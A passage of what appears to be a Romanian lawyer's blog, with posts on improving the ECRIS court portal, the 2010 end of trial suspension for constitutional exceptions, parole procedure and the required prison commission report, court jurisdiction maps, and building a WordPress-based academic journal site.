ECRIS ar putea fi mai strict în ceea ce privește structura numărului de dosar.

6. Afișierul online

În anumite împrejurări, procedura prevede posibilitatea ca citarea să se facă la sediul consiliului local (articolul 177:4 din Codul de procedură penală) sau prin publicitate – la ușa instanței și în Monitorul Oficial sau într-un ziar mai răspândit (articolul 95:2 din Codul de procedură civilă). Evident, aceste proceduri sunt mai mult formale, nimeni nu se așteaptă ca persoana citată să compară doar pentru că și-a găsit numele printre colile A4 lipite cu generozitate și haotic la afișierul consiliului local sau printre însemnările deosebit de accesibile și gratuite din Monitorul Oficial, partea XYZ…

Probabil că afișarea pe Internet nu ar avea șanse semnificativ mai mari pentru ca procedura de citare să fie eficientă. Totuși, crearea unui afișier online, ca secțiune distinctă pe pagina fiecărei instanțe, ar putea avea o oarecare utilitate (oricum, implementarea ar fi una nedureroasă și necostisitoare – v. un exemplu pe saitul Curții Constituționale).

ECRIS ar putea afișa și citații în cazurile când se face citarea prin publicitate.

7. Comunicarea online

Iarăși Star Trek… Chiar recent citisem o știre despre respingerea ca tardivă a unei cereri de recurs trimise prin email. Codul de procedură civilă (articolul 132¹:2) cuprinde mai nou posibilitatea încunoștințării părților prin mijloace electronice, iar Legea 455/2001 privind semnătura electronică prevede că în anumite condiții înscrisul semnat electronic „este asimilat, în ceea ce privește condițiile și efectele sale, cu înscrisul sub semnătură privată” (articolul 5). Totuși, aceste prevederi par a fi pur decorative din moment ce „sistemul” are o așa de mare aversiune față de comunicarea electronică.

Cum ar fi dacă fiecare parte ar primi din partea instanței (ministerului etc.), opțional bineînțeles, un certificat temporar emis exclusiv cu scopul de a-l folosi pentru semnarea documentelor comunicate în cursul procesului? De pildă, ca parte în proces solicit și primesc respectivul certificat, cu care semnez cererea de apel sau de recurs și o trimit instanței prin ECRIS. La fel de bine se pot depune și alte înscrisuri pe parcursul soluționării cauzei, fără a mai fi nevoie de coada de la registratură. Un model ar fi aplicația e-Curia a Curții de Justiție a Uniunii Europene.

Ar fi un început interesant…

ECRIS ar putea fi folosit și ca platformă de comunicare a actelor în cursul procesului.

8. Portal unic

Dintre instanțele judecătorești a căror activitate este reflectată pe portal lipsește Înalta Curte de Casație și Justiție. Aceasta are propriul sait, utilizând probabil o versiune mai veche a ECRIS (cu un IIS anterior lui .Net).
Deși în mod emfatic Curtea Constituțională este descrisă ca neaparținând autorității judecătorești, totuși ea funcționează după reguli familiare celorlalte instanțe (ex. ședințe publice, termene, citare). Ca și Î.C.C.J., Curtea Constituțională are propriul său mod (rudimentar) de afișare a informațiilor.

Nu ar fi decât în interesul publicului ca și activitatea acestor instanțe să fie reflectată în ECRIS, într-un mod unitar, coerent.

ECRIS ar putea include în mod unitar informații despre activitatea tuturor instanțelor, inclusiv a Î.C.C.J. și a C.C.R.

9. Performanța ECRIS

E de înțeles că și acum și pe viitor, traficul către portalul instanțelor de judecată va fi ridicat. Totuși, la sumele imense care apar în bugetele acestora (ex. în 2008 cheltuielile prevăzute pentru Tribunalul Dolj erau de 26.203.000 lei – peste 262 de miliarde de lei vechi…), e greu de crezut că nu se găsesc bani pentru servere mai acătării (care să nu fie îngenuncheate cu ușurința de acum) și pentru conexiuni în rețea cu viteză decentă.

ECRIS ar putea fi mai performant.

P.S. Nu puteam pierde ocazia de a semnala una dintre cele mai multiplicate greșeli de pe portal: „plângere contravetionala” – un -n- mâncat și niște diacritice scrise inconsecvent.

Mecanismul suspendării procesului are un temei de necontestat: dacă o pretenție supusă judecății ar fi afectată de neconcordanța unei legi cu prevederile Constituției, procesul trebuie oprit până când se pronunță instanța competentă să verifice constituționalitatea legilor. Acest mecanism era prevăzut explicit în Legea 47/1992 privind organizarea și funcționarea Curții Constituționale, în forma avută până la modificările din 2010:

Articolul 29
(5) Pe perioada soluționării excepției de neconstituționalitate judecarea cauzei se suspendă.

De-a lungul timpului, excepția de neconstituționalitate a devenit un mijloc facil de prelungire a proceselor. Cauzele erau suspendate, indiferent cât de inconsistente erau criticile de neconstituționalitate. Nu conta nici măcar dacă aceleași texte legale mai fuseseră deja analizate de Curtea Constituțională, toate excepțiile trebuie analizate cu aceeași atenție. Și așa, „reușita” invocării unei astfel de excepții „câștiga” câteva luni bune până când excepția ajungea să fie efectiv discutată, plus alte luni până la pronunțare, motivare și publicare în Monitorul Oficial.

În 2010, Legea 47/1992 a fost modificată prin Legea 177/2010 pentru modificarea și completarea Legii nr. 47/1992 privind organizarea și funcționarea Curții Constituționale, a Codului de procedură civilă și a Codului de procedură penală al României. Această lege abroga articolul 29:5 (citat mai sus) din Legea 47/1992 și adăuga noi cazuri de revizuire în Codul de procedură civilă (v. articolul 322:10) și în Codul de procedură penală (articolul 408²). Cazurile adăugate se referă la posibilitatea de a revizui o hotărâre după ce Curtea Constituțională s-a pronunțat, declarând ca neconstituțională o prevedere legală, incidentă în cauză.
Or, revizuirea este o cale de atac extraordinară care privește hotărâri rămase definitive în apel sau prin neapelare ori hotărâri pronunțate în recurs când se evocă fondul (în materie civilă), respectiv, hotărâri definitive (în materie penală). În esență, revizuirea poate fi cerută atunci când, după o judecată cu efecte definitive, se descoperă împrejurări necunoscute în timpul soluționării cauzei, care au afectat temeinicia sau legalitatea hotărârii atacate (ex. un martor a săvârșit infracțiunea de mărturie mincinoasă, un înscris utilizat a fost declarat fals, un membru al completului de judecată a comis o infracțiune în legătură cu cauza, cel puțin două hotărâri judecătorești definitive nu se pot concilia…).

Ajungem la o problemă de interpretare a voinței Legislativului. Dacă acesta ar fi intenționat menținerea posibilității de suspendare a cauzei până la pronunțarea Curții Constituționale ar fi fost imposibil ca în cauza în care a fost ridicată excepția de neconstituționalitate să fie pronunțată o hotărâre care să devină definitivă, întrucât judecata ar fi fost suspendată.
Din interpretarea dispozițiilor principale ale Legii 177/2010 (abrogarea articolului care prevedea suspendarea judecății și introducerea unor noi cazuri de revizuire) reiese că Legislativul a intenționat reducerea posibilității de tergiversare a proceselor prin invocarea excepției de neconstituționalitate, fapt care este confirmat în mod neîndoielnic și de expunerea de motive atașată proiectului Legii 177/2010, disponibil pe pagina de Internet a Camerei Deputaților: „(…) nu este mai puțin adevărat faptul că invocarea excepțiilor de neconstituționalitate de către părți este folosită de multe ori ca modalitate de a întârzia judecarea cauzei. Numărul extrem de ridicat al dosarelor aflate pe rolul Curții Constituționale ca urmare a invocării frecvente a excepțiilor de neconstituționalitate face ca soluționarea acestora să dureze extrem de mult, în detrimentul celerității judecății cauzelor. (…) Apreciind că este necesară o soluție care să corespundă acestei realități propunem eliminarea posibilității suspendării cauzei în cazul sesizării Curții Constituționale (…) 2. Schimbări preconizate – Principala prevedere a proiectului constă în eliminarea suspendării judecării cauzei în cazul invocării excepției de neconstituționalitate”.

Cu toate acestea, suspendarea procesului a fost dispusă potrivit dreptului comun (v. articolul 244:1.1 din Codul de procedură civilă: „Instanța poate suspenda judecata: 1. când dezlegarea pricinii atârnă, în totul sau în parte, de existența sau neexistența unui drept care face obiectul unei alte judecăți;”).

De ce mai era nevoie de vechea prevedere explicită privind suspendarea (v. articolul 29:5 din Legea 47/1992, forma veche), dacă măsura era posibilă și conform procedurii comune?

Dacă scopul Legii 177/2010 este cel declarat în expunerea de motive menționată, nu era oare mai simplu ca în loc de abrogarea alineatului (5) de la articolul 29, să fie făcută o modificare explicită, de pildă: „Pe perioada soluționării excepției de neconstituționalitate judecarea cauzei nu se suspendă.”?

Completare – 27.11.2011: Față de Legea 177/2010 au fost formulate obiecții de neconstituționalitate supuse controlului a priori al Curții Constituționale. Curtea le-a respins printr-o decizie (1.106/2010) publicată în același număr al Monitorului Oficial ca și legea (MO 627/2010). Considerentele Curții sunt interesante.

P.S. Efectul dilatoriu al excepției de neconstituționalitate poate fi cu ușurință transferat unui nou instrument: trimiterea preliminară către Curtea de Justiție a Uniunii Europene (v. Situația trimiterilor preliminare din România).

Încă de la primul contact cu liberările condiționate am cerut instanței să dispună depunerea la dosar a procesului-verbal emis de comisia pentru individualizarea regimului de executare a pedepselor privative de libertate. Spre surprinderea mea, solicitarea a fost respinsă pe motiv că dacă respectiva comisie nu a luat în discuție cazul petentului, nu avea cum să emită procesul-verbal.

Textul de față își propune să treacă în revistă această problemă de interpretare, încadrând puțin lucrurile într-un context.

Ce este liberarea condiționată?
Atunci când se ivește ocazia, dreptul nostru penal este descris ca fiind unul caracterizat prin „umanism”. Bineînțeles, umanismul e mai mult pe hârtie, decât în realitate… Datorită acestui principiu există și reglementarea posibilității unui condamnat ca, atunci când îndeplinește condițiile cerute de lege, să poată fi liberat (de ce nu „eliberat” – e o altă discuție) înainte să execute integral pedeapsa. Liberarea condiționată nu operează automat, ci numai dacă instanța apreciază, pe bază de probe și în anumite condiții, că prin conduita condamnatului scopul educativ și preventiv al pedepsei a fost atins. „Liberarea condiționată nu trebuie acordată întotdeauna, imediat după executarea efectivă a fracțiunilor de pedeapsă prevăzute de art. 59 şi 60 C.pen, ci numai dacă, în urma unei cercetări amănunțite a modului de comportare a condamnatului în timpul executării pedepsei și a antecedentelor sale penale, instanța își face convingerea că îndreptarea condamnatului este posibilă și fără executarea efectivă a întregii pedepse.” (Decizia de îndrumare a Tribunalului Suprem nr. 6/1970, v. documentul Decizii ICCJ, penal, 20.12.2010 din articolul Jurisprudenta instantei supreme: RIL-uri)

Ce prevede legea
Instituția liberării condiționate e prevăzută de actualul Cod penal (cunoscut și ca Legea 15/1968) în două forme: pentru infracțiuni pedepsite cu detențiune pe viață (articolul 55¹) și pentru infracțiuni pedepsite cu închisoare (articolele 59-60).
Pe scurt, condițiile liberării condiționate sunt:
(1) executarea fracției de pedeapsă prevăzută de lege (ex. 20 de ani în cazul detențiunii pe viață; 2/3 în cazul pedepselor cu închisoarea până la 10 ani; 3/4 în cazul pedepselor cu închisoarea peste 10 ani);
(2) stăruința în muncă a condamnatului;
(3) disciplina de care a dat dovadă condamnatul în timpul executării pedepsei;
(4) dovezile temeinice de îndreptare a conduitei condamnatului.

Codul de procedură penală încă în vigoare (cunoscut și ca Legea 29/1968) conține la articolul 450 prevederi legate de: competența instanței (judecătoria în a cărei circumscripție se află locul de deținere, respectiv, tribunalul militar pentru condamnatul militar deținut în închisoarea militară și devenit inapt serviciului), procedura de judecată și calea de atac (recurs într-un termen de 3 zile).

Codul conține și o trimitere la legea privind executarea pedepselor. Până în 2006, aceasta era Legea 23/1969 privind executarea pedepselor. Inițial această lege ar fi urmat să fie abrogată prin Legea 294/2004 privind executarea pedepselor și a măsurilor dispuse de organele judiciare în cursul procesului penal, dar din cauza incoerenței legislative și gâlcevii politice iscate în legătură cu intrarea în vigoare a unui nou cod penal în 2005, Legea 275/2006 privind executarea pedepselor și a măsurilor dispuse de organele judiciare în cursul procesului penal este cea în vigoare azi (bineînțeles, urmând și ea a fi înlocuită de o altă lege, potrivită noului cod penal ce va să fie – observați nefireasca și continua prezență a „noului”, de parcă ar fi desprins dintr-o reclamă obosită).

Legea 275/2006 reglementează câteva detalii procedurale pentru liberarea condiționată la articolele 75-77. Cu relevanță pentru discuția de față, este prevăzută luarea în considerare la calculul fracției de pedeapsă executată a duratei muncii prestate sau a instruirii școlare și formării profesionale (ex. pentru 4 zile de muncă remunerată a condamnatului major, pe bază de voluntariat sau în caz de calamitate, se consideră 5 zile executate; pentru 3 zile de muncă neremunerată, 4 zile executate etc.). Includerea duratelor astfel calculate în fracția de pedeapsă executată nu poate fi revocată.

Esențial în contextul discutat este articolul 77. Acesta prevede două moduri de inițiere a procedurii liberării condiționate: la cererea persoanei condamnate sau la propunerea comisiei pentru individualizarea regimului de executare a pedepselor privative de libertate. Este apoi descrisă componența acestei comisii (ex. directorul penitenciarului, directori adjuncți, consilier de probațiune etc., cu participarea judecătorului delegat pentru executarea pedepselor privative de libertate, în calitate de președinte). Articolul 191 din HG 1897/2006 (regulamentul de aplicare a Legii 275/2006), pe lângă duplicarea inutilă și tipică a prevederilor legii, prevede că respectiva comisie analizează săptămânal dosarele individuale ale condamnaților.
Legea prevede că propunerea comisiei privind admiterea liberării condiționate se consemnează într-un proces-verbal motivat care se înaintează judecătoriei competente, împreună cu documentele care atestă mențiunile cuprinse în acesta. E de notat o mică neconcordanță cu prevederile Codului de procedură penală, care atribuie competență, într-un caz special, tribunalului militar.

Conținutul procesului-verbal este indicat indirect prin articolul 77:2 din lege: „(…) fracțiunea din pedeapsă efectiv executată și de partea din durata pedepsei care este considerată ca executată pe baza muncii prestate, de conduita persoanei condamnate și de eforturile acesteia pentru reintegrarea socială, în special în cadrul activităților educative, culturale, terapeutice, de consiliere psihologică și asistență socială, al instruirii școlare și al formării profesionale, de responsabilitățile încredințate, de recompensele acordate, de sancțiunile disciplinare aplicate și de antecedentele sale penale”.

Dacă analiza comisiei are ca rezultat constatarea că persoana condamnată nu întrunește condițiile pentru a fi liberată condiționat, în procesul-verbal se fixează un termen pentru reexaminare, de cel mult un an. Totodată, comisia va aduce la cunoștința condamnatului că se poate adresa direct instanței cu o cerere de liberare condiționată.
Alineatul următor (5) pare a continua și dezvolta prevederea anterioară, arătând că atunci când condamnatul se adresează direct instanței, odată cu cererea se trimite și procesul-verbal, împreună cu documentele care atestă mențiunile cuprinse în acesta.
În fine, ultimul alineat (6) prevede posibilitatea instanței de a consulta dosarul individual al persoanei condamnate. Deși, potrivit articolului 78 din lege, acest dosar este o sursă bogată de informații (ex. copie de pe hotărârea de condamnare, mandatul de executare a pedepsei, menționarea date când a început executarea, cazierul judiciar, documente referitoare la activitățile în care a fost implicat condamnatul), în scurta experiență pe care am acumulat-o nu mi-a fost încă dat să văd măcar un singur judecător care să uzeze de această posibilitate.

Problema
După această anevoioasă introducere, problema discutată poate fi formulată mai clar: în cazul unei cereri de liberare condiționată adresate direct instanței, este sau nu necesară depunerea la dosar a procesului-verbal al comisiei abilitate de la penitenciar?

Găsirea unui răspuns
Mai întâi, merită menționată o soluție de speță dată în temeiul vechii legi privind executarea pedepselor (Legea 23/1969). O consider relevantă pe de-o parte pentru că prevederile acelei legi (articolele 27-28) aproape coincid cu cele din legea în vigoare azi (articolul 77), iar pe de altă parte, pentru că soluția este pronunțată de Tribunalul Suprem – o instanță care a funcționat în timpul regimului comunist, de la care nu așteptam prea multe în privința respectării drepturilor omului. Soluția, citată într-o notă de subsol în Drept procesual penal: partea specială – Prof. univ. dr. Ion Neagu; București, Global Lex, 2004. p. 352, menționează că „instanța nu poate trece la soluționarea cererii de liberare condiționată a condamnatului numai pe baza cererii acestuia și a unor comunicări făcute de locul de deținere cu privire la situația lui, fără să existe la dosarul cauzei și procesul verbal întocmit potrivit cu art.28 din Legea nr.23/1969 privind executarea pedepselor. (T.S., S.p., d. nr.777 din 1972, în R.R.1, nr.7, 1972, p.160)”.

Ideea apare și în motivarea unui recurs în interesul legii și în considerentele deciziei Înaltei Curți de Casație și Justiție prin care acesta a fost admis. Este vorba despre Decizia nr. LXVII (67)/15.10.2007 (publicată în M.O. 537/2008):
„Așa fiind, cererea de liberare condiționată nu poate fi examinată sub aspectul îndeplinirii tuturor condițiilor legale decât după parcurgerea anumitor etape, respectiv verificarea regularității actului de sesizare, a competenței și a rămânerii definitive a hotărârii judecătorești în a cărei executare se află condamnatul, primirea procesului-verbal al comisiei pentru individualizarea regimului de executare a pedepselor privative de libertate și a documentelor care atestă mențiunile din acestea, inclusiv fracția de pedeapsă executată efectiv, eventual după consultarea dosarului individual și administrarea altor probe pe care instanța le apreciază ca utile și pertinente în cauză.”
Decizia e foarte interesantă și pentru o discuție adiacentă: „Cererea de liberare condiționată va fi examinată de instanță, sub aspectul îndeplinirii tuturor condițiilor legale, la momentul judecării acesteia, și nu la momentul introducerii ei.”…

Cu alte cuvinte, atât procurorul general al României, cât și instanța supremă, fie și în niște rationes decidendi (sau obiter dicta?) care nu sunt în sine obligatorii, consideră că procesul-verbal, prevăzut destul de interpretabil în lege, este necesar la soluționarea cererii de liberare condiționată. Totuși, unele instanțe învestite în aceste cereri preferă menținerea unei practici care, până la urmă, are ca efect prelungirea inutilă a proceselor, dar și posibilitatea pronunțării unor hotărâri netemeinice, bazate doar pe adresele primite de la penitenciar și care se limitează prea strict la aspecte de calcul sumar al fracției executate, fără a încerca de pildă să verifice și dacă au fost desfășurate activitățile care se includ în calculul duratei executate. Nu se poate face o apărare decentă numai pe baza unei cereri (adesea incomplete și scrise agramat), în lipsa unor date elementare certe (pedeapsa aplicată, perioada lucrată, antecedentele disciplinare de la penitenciar etc.) – să nu aud reproșuri privind studiul dosarului de la penitenciar, în condițiile în care te poți trezi ținut în fața porții pentru că ai o delegație de apărător din oficiu și nu o împuternicire (v. Penitenciarul de Minori și Tineri Craiova…).

Este destul de limpede că într-o cerere de liberare condiționată acest proces-verbal cuprinde detalii foarte utile pentru soluționare, mai ales dacă este însoțit, potrivit legii, de documentele doveditoare. Suplinirea lui prin simple adrese, neprevăzute explicit de lege, și luarea în considerare într-un mod simplist a fracției de pedeapsă executate (aceasta fiind calculată și comunicată tot de penitenciar) nu reprezintă soluționări temeinice și riguroase ale cauzelor.

Documente utile
Notă: Textele de lege au fost actualizate manual (copy/paste migălos), așa că pot conține inadvertențe!

• Codul penal
• Legea 275/2006 privind executarea pedepselor și a măsurilor dispuse de organele judiciare în cursul procesului penal
• Codul de procedură penală
• Decizia în interesul legii nr. LXVII (67)/15.10.2007
• Recurs în interesul legii nr. 1734/107/2007
• Legea 23/1969 privind executarea pedepselor
• sinteză privind liberarea condiționată

P.S.
1. Ca o simplă sugestie, n-ar strica un recurs în interesul legii pentru a lămuri problema discutată aici sau, mai bine, corectarea formulării defectuoase din lege.
2. Apropo de practici pe care le-am mai remarcat, încă nu am văzut judecătorul care să evalueze mai critic retragerile de cereri sau contestații formulate de condamnați pe motiv că nu ar fi scrise/semnate de ei, ci de colegi de-ai lor. N-am observat să se compare semnături sau să se recunoască măcar aceleași și aceleași fețe de campioni la petiții. Nu de alta, dar recent ministrul justiției se preocupa de necesitatea ajustării asistenței judiciare din oficiu, pentru a limita cheltuielile statului. Cum onorariile avocaților din oficiu (inclusiv subsemnatul) se plătesc de stat, urmând a fi imputate apoi (cel mai probabil niciodată…) petenților cărora le-au fost respinse cererile, e ușor de observat cine suportă pierderea.

Încă de la începutul verii, cam în vremea „dezbaterilor” despre reorganizarea administrativ-teritorială a României, am terminat munca la două hărți la care m-am tot gândit încă din vremea când învățam pentru admiterea în barou despre competența teritorială a instanțelor. Este vorba despre o hartă a circumscripțiilor instanțelor civile și una a celor militare.

Hărțile ar fi urmat să ilustreze un articol de Wikipedia despre organizarea judiciară din România. N-am avut deloc inspirație să scriu ceva util, mai mult decât copy/paste din limba de lemn a textelor legale, așa că mă mulțumesc să public hărțile în speranța că poate altcineva își va cheltui o parte din timpul său pentru a scrie și ceva text.
Sper că așa va fi mai ușor de înțeles deosebirea între diferitele grade de jurisdicție: judecătorie < tribunal < curte de apel < Înalta Curte de Casație și Justiție.
Notă: Am inclus și modificările efectuate prin HG 868/2011 (MO 642/2011).

Descoperiri:

• am aflat cu stupoare că existau destule instanțe numai în textul normativ, însă care nici după ani buni nu fuseseră înființate (ex. Judecătoria Bechet, Dolj); alte instanțe, precum Tribunalul Ilfov, nici azi nu sunt funcționale, în ciuda trâmbițatei înființări prin luna mai;
• există, chiar și după desființarea unor instanțe, judecătorii cu circumscripții disproporționate ca suprafață – cf. Craiova vs. Adjud, Sinaia vs. Târgu-Jiu; există circumscripții cu forme neobișnuite (necontigue – Însurăței/Brăila, Huși/Vaslui; filiforme – Cluj-Napoca);
• nu există o hartă oficială a unităților administrativ-teritoriale de nivel LAU 2 (municipii, orașe, comune) – cam așa arată ceea ce aș vrea să văd; baza pe care am folosit-o pentru trasarea limitelor comunelor este generată în GIS și folosește date mai vechi – așadar, e destul de probabil să existe mici erori în delimitări;
• mai ales după anul 2000 harta administrativă a fost îmbogățită cu destule comune; împărțind electoratul sau doar realizând orgolii meschine („să fie și satul nostru un miez de comună!”) a fost împărțită și sărăcia – acum se plâng că nu au suficiente fonduri din impozite și taxe locale pentru a realiza ceva semnificativ în comună.
• nu există o concepție unitară privind diversele diviziuni ale țării (ex. circumscripții de judecătorii, colegii electorale, circumscripții fiscale, silvice, circumscripții de curți de apel vs. regiuni de dezvoltare etc.).

2. forumgeografic.ro

Ideal era un CMS special conceput pentru reviste academice. Mi-a plăcut foarte mult Ambra (ex. PLoS One). Din nefericire, platforma pentru care a fost creat (Java) nu e suportată de hosting-ul nostru. Un alt obstacol semnificativ e modul de instalare (mult mai greu decât clica-clica obișnuit pentru CMS-uri populare). Pe locul doi în lista de opțiuni era Lodel. Marele lui neajuns a fost instalarea defectuoasă pe mașina de test (ex. cam prea multe deprecated-uri sâcâitoare pentru gustul meu). Am luat în calcul și OJS. Și el a dat câteva rateuri la instalare (ca și în cazul lui Lodel, codul nu e încă ajustat la PHP 5.x), dar putea fi făcut să meargă. Nu mi-a plăcut interfața îmbătrânită și extrem de „birocratizată” (are câte un tabelaș, câte un mesaj, câte o procedură pentru fiecare pas din peer review). Deși era tentantă și crearea unui CMS de la 0 în CodeIgniter, totuși a coda un întreg mecanism de autentificare, gestiune a conținutului, afișare etc. ar fi consumat enorm de mult timp pe care nu îl am la dispoziție.

… așa că am păstrat WordPress și am trecut la hăcuirea lui. Am renunțat la tema Atahualpa în favoarea uneia noi și (foarte) personalizate. Am adăugat noi plugin-uri, de departe cel mai util și frumos conceput mi s-a părut Codestyling Localization. Am adăugat noi funcții pentru lucrul cu taxonomii și custom fields, noi template-uri (pentru pagina de arhive, pentru paginile de cuprins, pentru pagina redacției – aici un simplu CSV exportat din OpenOffice.org Calc este procesat și afișat după șablon), generatoare de metadate Google Scholar și CrossRef. Datele bibliografice ale articolelor sunt trimise în JSON, iar de aici pot fi afișate în câteva formate de citare, dar și exportate ca file RIS și BibTeX. Am curățat baza de date de resturile de la teme și plugin-uri dezinstalate (wp_options păstra câteva sute bune de înregistrări complet inutile). Pentru orice funcție am încercat să nu stric prietenia cu qTranslate. Am păstrat URL-urile cât mai curate și intuitive (mai puțin folosirea id-ului pentru articole, în locul unui slug de lungime variabilă, adesea foarte lung). Am acordat puțină atenție și optimizării performanței (ex. caching, minification). Am vectorizat logo-ul făcut de Andra și am mai câștigat niște spațiu în partea de sus a paginii așezând logo-ul deasupra imaginii de fundal. A fost nevoie de un halou pentru ca logo-ul să fie vizibil indiferent de culoarea dominantă de sub el. Am modificat și șablonul Word pentru articole (sunt acolo și niște câmpuri care calculează prima și ultima pagină etc.).
Din perspectiva SEO saitul nu stă rău: un PageRank de 5 e decent (mai ales că până acum chiar nu m-a interesat SEO). Și Publish or Perish a început să raporteze indici din ce în ce mai buni (metadatele Google Scholar sunt responsabile aici).

Descoperiri:

• PHP + collation + UTF-8 != ‘love’ – aveam nevoie ca autorii să fie ordonați alfabetic, într-un mod cât mai firesc (ex. Ț nu e între L și O, Î nu e înainte de B)… Totul se limita la sortarea unei array. N-am reușit să obțin ceea ce doream (și am încercat destule combinații de setlocale(), strcoll(), uasort() ș.a.m.d.). Până la urmă, cred că soluția cu care m-am consolat este cea mai bună, având în vedere că numele de autori pot avea inițiale cu diacritice neromânești (ex. Ž, Đ): ordonarea se face pe baza alfabetului latin, după ce caracterele cu diacritice sunt convertite în cel mai apropiat semn din setul ASCII;
• trimiterea JSON dintr-un form – avem un query în baza de date, rezultatele ajung ca JSON într-o variabilă JavaScript, se pune problema folosirii acesteia pentru a genera local și oferi spre descărcare o filă (RIS, BibTeX…). Din cauza numeroaselor limitări din felul în care browserele tratează JavaScript, dar și a faptului că soluția găsită (Downloadify) este dependentă de Flash 10, am renunțat la ideea generării locale a filei. Trebuia însă folosit JSON-ul deja generat. Problema e că trimiterea din form a JSON-ului ca obiect face ca serverul să primească, evident, un [Object] inutil. A fost nevoie, oricât de zgârcit aș fi, de trimiterea JSON-ului în dublu exemplar: ca obiect JavaScript, utilizat pentru afișarea în diferitele formate de citare, și ca text, utilizat ca valoare a unui hidden input pentru generarea pe server a filelor RIS/BibTeX;
• formate de citare – când mi-am scris lucrarea de licență nu aveam idee despre cât de complicată e lumea asta a referințelor academice. În lipsa unor instrucțiuni clare și bine structurate din partea facultății, am imitat stilul de citare găsit în cărți și am crezut că e bine așa. Cât de mult mă înșelam… Fiind nevoit să afișez citările în formate diferite, am parcurs instrucțiunile din câteva manuale de stil. În Occident parcă e o întrecere în privința stilurilor de citare, care mai de care mai încâlcite și pretențioase. Sunt sute de stiluri pentru afișarea unui set relativ restrâns de date (ex. autori, titlu, an, publicație…). Am întâlnit felurite mofturi ridicole – ex. în minunatul stil Turabian (de fapt, Chicago cu variațiuni) numele primului autor e scris inversat (Nume, Prenume), dar restul numelor de autori sunt enumerate în ordinea obișnuită (Prenume Nume; mulțumim, Kate Turabian!); în stilul APA, acolo unde sunt peste șapte autori, sunt enumerați primii șase, se adaugă „. . .” și apoi ultimul autor (dacă o lucrare are opt autori, cel de-al șaptelea e un ghinionist pentru că numele lui e înlocuit cu „. . .”). Am mai auzit și de mofturi de-a dreptul revoltătoare din folclorul academic autohton – ex. prenumele autoarelor s-ar scrie complet, pe când prenumele autorilor ar fi reprezentat prin inițială.
  Noroc cu formatele text de tip RIS/BibTeX. Datele lor pot fi importate în aplicații precum Zotero și apoi afișate într-o mulțime de stiluri, fără ca utilizatorul să fie nevoit să știe reguli aberante;
• conversie UTF-8 în entities – am găsit o excelentă soluție, utilă pentru encodarea caracterelor UTF-8 în XML.